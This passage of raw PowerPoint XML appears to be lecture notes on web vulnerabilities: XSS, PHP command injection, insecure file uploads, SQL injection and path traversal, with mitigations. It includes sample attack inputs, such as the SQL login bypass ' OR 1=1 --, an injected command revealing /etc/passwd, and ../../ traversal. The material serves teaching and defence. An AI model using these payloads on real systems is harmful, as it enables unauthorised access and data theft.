            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> string, attacker boleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>masukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> script/code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When a vulnerable website displays user-provided data without properly sanitizing it, attackers can execute malicious JavaScript in other users' browsers, potentially leading to a range of harmful actions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="750"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How does XSS work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How an XSS Attack Works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The attacker inserts malicious code (usually JavaScript) into a web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: When another user visits the page, the browser executes the script as if it were legitimate content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The attacker’s code can then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal session cookies or tokens to impersonate the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirect the user to malicious sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform actions on behalf of the user (e.g., changing account settings).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Display phishing prompts or fake login forms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3288713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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323045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roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Command injection attacks are possible largely due to insufficient input validation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code retrieves the value of the filename parameter from the URL query string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example URL: http://example.com/delete.php?filename=file.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case, $filename will be set to file.txt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Concatenates the user-supplied filename into a system command that deletes files using rm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes the command using PHP's system() function, which passes the command to the operating system shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deletes file.txt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displays the contents of /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd, which could leak sensitive user information.</a:t>
            </a:r>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221036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Use native PHP functions or built in libraries/plugins in framework.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232144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6A567-E3BB-FF42-8A1B-41F5746FB1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22D72-C969-1952-68EE-C6EDC72B6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D49C9-A863-A449-ED6E-7F38A0690A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How to Mitigate File Upload Vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Validate File Types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Whitelist allowed file types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (e.g., images, PDFs, etc.) and strictly reject all other types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the MIME type of the file as well as its extension.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid relying solely on file extensions, as they can be easily manipulated. Instead, use a combination of methods (e.g., checking magic numbers, file signatures).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Limit File Size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set a maximum file size limit to prevent the upload of large files that could consume server resources or be used in DoS attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rename Uploaded Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rename uploaded files to avoid conflicts or malicious behavior. Use a randomized or unique naming scheme (e.g., user12345.jpg), and do not rely on the user’s original file name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Store Files Outside of Web Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store uploaded files in a directory outside the web root (/var/www/html or similar) to prevent direct access via a browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Disable Execution of Uploaded Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure the server to prevent the execution of uploaded files in the upload directory. This can be done by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Apache) or equivalent configurations to disable script execution in the upload folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Apache:apache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;Directory "/var/www/html/uploads"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> engine off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> text/plain .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> .asp &lt;/Directory&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Nginx, you can block PHP execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>by:nginx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>location ~* \.(php|php5|phtml)$ { deny all; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" rtl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Check File Content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For file types like images or documents, check the actual content of the file to ensure it's not being tampered with. You can use libraries like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ImageMagick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to inspect the content of image files and other file types.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF90857E-F3C2-2982-5987-5F6B5E59EC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="863877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 OR 1=1 –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The -- part is a SQL comment, which means everything after it is ignored. The OR 1=1 always evaluates to true, so the entire condition becomes true, regardless of the password.</a:t>
            </a:r>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2765238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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498819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 OR 1=1 –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The -- part is a SQL comment, which means everything after it is ignored. The OR 1=1 always evaluates to true, so the entire condition becomes true, regardless of the password.</a:t>
            </a:r>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944984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Validate Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that user input (such as file names or paths) is properly validated and sanitized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only allow trusted values. For example, use a whitelist of acceptable files, or only allow file names that match a specific format (e.g., alphanumeric).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2. Use Absolute Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always use absolute paths when including files. Avoid allowing user input to determine the file path. This can prevent attackers from navigating the file system (e.g., using ../../ to access sensitive files).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Instead of allowing input like $_GET['page'], use a fixed set of allowed pages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>allowed_pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> = ['home', 'about', 'contact'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>$page = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>in_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>($_GET['page'], $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>allowed_pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>) ? $_GET['page'] : 'default';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>include("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>page.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4. Sanitize File Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize file paths to prevent directory traversal (e.g., using .. to move up the directory structure). You can use functions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>realpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() to ensure the file is within the expected directory.</a:t>
            </a:r>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293774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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87066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Define systems, applications, and data to be tested, gain permission and credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collect info and identify vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use automated tools to identify open ports </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
